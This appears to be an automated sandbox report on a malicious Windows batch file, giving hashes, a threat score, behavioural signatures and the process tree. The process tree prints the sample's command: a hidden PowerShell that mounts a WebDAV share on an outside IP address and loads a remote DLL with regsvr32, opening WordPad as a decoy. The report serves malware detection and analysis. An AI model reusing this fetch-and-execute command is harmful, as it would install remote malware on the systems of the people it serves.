Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
20-07-2024 19:32
Static task
static1
Behavioral task
behavioral1
Sample
137666011097431048.bat
Resource
win7-20240705-en
windows7-x64
7 signatures
120 seconds
Behavioral task
behavioral2
Sample
137666011097431048.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
120 seconds
General
-
Target
137666011097431048.bat
-
Size
17KB
-
MD5
460cf189d3881e67b4beb1e60c25d62e
-
SHA1
9c62c41fd33fab8d8fc3dd812015c897b64f371e
-
SHA256
02c51e814fa86458ff001de22fbdac40fe9bc061bad17f2d5b3413e94e294c49
-
SHA512
19ef3e622e9ccf21e99582c57986e995a45d1cc0862a8ec6489d2ca23e84432fe73e75145f88b273a232ef84e46c395f5673d5c08d79dcc9ecef7ab4a80d5ad6
-
SSDEEP
384:HhsoPhYNe1LpdAY88KY88nc0h9oKUsXVsibks7LcURaC3EED:BsopSSdAY88KY88njcx4VPqURAg
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2060 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1872 wordpad.exe 1872 wordpad.exe 1872 wordpad.exe 1872 wordpad.exe 1872 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2540 wrote to memory of 1872 2540 cmd.exe 31 PID 2540 wrote to memory of 1872 2540 cmd.exe 31 PID 2540 wrote to memory of 1872 2540 cmd.exe 31 PID 2540 wrote to memory of 2060 2540 cmd.exe 32 PID 2540 wrote to memory of 2060 2540 cmd.exe 32 PID 2540 wrote to memory of 2060 2540 cmd.exe 32 PID 2060 wrote to memory of 2904 2060 powershell.exe 34 PID 2060 wrote to memory of 2904 2060 powershell.exe 34 PID 2060 wrote to memory of 2904 2060 powershell.exe 34 PID 2060 wrote to memory of 2748 2060 powershell.exe 35 PID 2060 wrote to memory of 2748 2060 powershell.exe 35 PID 2060 wrote to memory of 2748 2060 powershell.exe 35 PID 2060 wrote to memory of 2748 2060 powershell.exe 35 PID 2060 wrote to memory of 2748 2060 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\137666011097431048.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\43263145819989.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2904
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\43263145819989.dll3⤵PID:2748
-
-